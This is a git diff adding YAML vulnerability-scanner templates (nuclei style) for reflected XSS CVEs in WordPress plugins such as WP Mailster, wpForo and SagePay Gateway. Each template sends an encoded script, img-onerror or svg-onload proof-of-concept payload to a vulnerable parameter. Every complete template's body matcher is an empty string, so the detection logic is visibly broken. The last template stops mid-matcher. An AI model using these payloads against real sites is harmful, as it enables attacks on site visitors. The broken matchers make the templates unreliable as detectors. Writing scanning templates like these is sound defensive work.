diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml
new file mode 100644
index 0000000..3d321b4
--- /dev/null
+++ b/CVE-2017-17043.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+
+info:
+ name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml
new file mode 100644
index 0000000..ecf71fa
--- /dev/null
+++ b/CVE-2017-17059.yaml
@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+ name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ reference: |
+ - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+ body: "amty_hidden=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml
new file mode 100644
index 0000000..40a4e59
--- /dev/null
+++ b/CVE-2017-17451.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+ name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml
new file mode 100644
index 0000000..5ac65f8
--- /dev/null
+++ b/CVE-2017-18536.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+ name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml
new file mode 100644
index 0000000..19bdc03
--- /dev/null
+++ b/CVE-2017-9288.yaml
@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+ name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+ tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml
new file mode 100644
index 0000000..4f305a6
--- /dev/null
+++ b/CVE-2018-11709.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+ name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml
new file mode 100644
index 0000000..79a0cbd
--- /dev/null
+++ b/CVE-2018-20462.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+ name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml
new file mode 100644
index 0000000..7553a25
--- /dev/null
+++ b/CVE-2018-5316.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+ name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+ tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml
new file mode 100644
index 0000000..55c9e48
--- /dev/null
+++ b/CVE-2019-15713.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+ name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+ reference: |
+ - https://wpscan.com/vulnerability/9267
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "